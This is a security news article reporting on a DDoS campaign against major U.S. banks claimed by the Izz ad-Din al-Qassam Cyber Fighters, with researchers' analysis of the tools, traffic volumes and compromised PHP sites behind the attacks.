UPDATE — The group that claimed responsibility for large-scale distributed denial-of-service attacks against major U.S. banks in September and October has carried out another flurry of attacks that are still ongoing today.
Izz ad-Din al-Qassam Cyber Fighters posted its latest threat on Pastebin, again claiming the attacks are in retaliation for the portrayal of Muslims in the “Innocence of Muslims” movie trailers on YouTube. The group said earlier this week that the attacks were imminent and named U.S. Bancorp, JP Morgan Chase, Bank of America, PNC Financial Services Group and SunTrust Banks as its targets.
“In new phase, the wideness and the number of attacks will increase explicitly; and offenders and subsequently their governmental supporters will not be able to imagine and forecast the widespread and greatness of these attacks,” Izz ad-Din al-Qassam said in its post.
Arbor Networks this week said it noticed attacks against some of the named institutions using a mix of tools, including subtle modifications to Brobot, also known as itsoknoproblemobro. Solutionary, meanwhile, said that organizations using third-party hosting and processing services could experience delays in transaction processing because of the attacks.
“Some of this week’s attacks have been as large as 60Gbps. What makes these attacks so significant is not their size, but the fact that the attacks are quite focused, part of an ongoing campaign, and like most DDoS attacks quite public,” wrote Dan Holden, director of security research, and Curt Wilson, security analyst, of Arbor in a blog post. “These attacks utilize multiple targets, from network infrastructure to Web applications.”
Security companies such as Arbor and Prolexic were among the first to identify itsoknoproblemobro as one of the tools behind the attacks, which were successful in causing intermittent disruptions to online banking services in particular; the banks and security experts said no data or transactions were stolen.
The current wave of attacks have produced fewer outages, Holden told Threatpost, primarily because the banks has learned from the previous attacks, understood the attackers’ tactics, and were better prepared.
“It’s kind of like historical warfare; if you know when and how they’re going to come at you, you prepare better,” said Holden. “It will be interesting to see how the attackers grow and change futher.”
In the latest set of attacks, the group has been able to fire bad traffic at multiple targets simultaneously, Holden said.
“If you’re sending 40 GBPS of traffic across two targets, that’s definitely a feat,” Holden said. “That’s difficult to do from the attacker’s standpoint, and difficult to defend. The banks have been far better prepared this time because they’ve seen these attacks before.”
Holden and Wilson said the attackers were using sites compromised via exploits against vulnerable PHP Web applications, including some Joomla sites as well as WordPress sites using a vulnerable plug-in called TimThumb. TimThumb is an image re-sizing library used in premium WordPress themes. Users of Joomla sites, meanwhile, were reporting iFrame injection attacks that were redirecting users to malicious sites. No connection between the two has been reported.
“Unmaintained sites running out-of-date extensions are easy targets and the attackers took full advantage of this to upload various PHP webshells which were then used to further deploy attack tools,” said Holden and Wilson. “Attackers connect to the compromised webservers hosting the tools directly or through intermediate servers/proxies/scripts and issue attack commands.”
Brobot, KamiKaze and AMOS were among the tools identified by Arbor as those used in the initial run of attacks. KamiKaze packets are used in denial-of-service attacks because they require more router processing than typical traffic packets. The three tools in conjunction enable attackers to fire massive amounts at traffic at targets simultaneously, beating the banks’ built-in capabilities to absorb such attacks.
“Banks have high bandwidth connections into their data centers. They can take a lot of traffic, plus they all use security and DDoS protection services,” said Dmitri Alperovich, CTO of CrowdStrike of the September attacks, some of which peaked at 70 GBPS to 100 GBPS. “This is massively higher than what we see on a normal basis.”
Arbor said it has seen application layer attacks against HTTP, HTTPS and DNS, with attack packets coming from a number of protocols, including TCP, UDP and ICMP. In other words, sites may not be going down, but instead, applications could be crashing or become unavailable.
“What these attacks have continued to demonstrate is that DDoS will continue to be a popular and increasingly complex attack vector. DDoS is no longer simply a network issue, but is increasingly a feature or additional aspect of other threats,” Holden and Wilson said. “The motivation of modern attackers can be singular, but the threat landscape continues to become more complex and mixes various threats to increase the likelihood of success.”
This article was updated at 11:45 a.m. ET to include further comment and analysis from Dan Holden of Arbor Networks.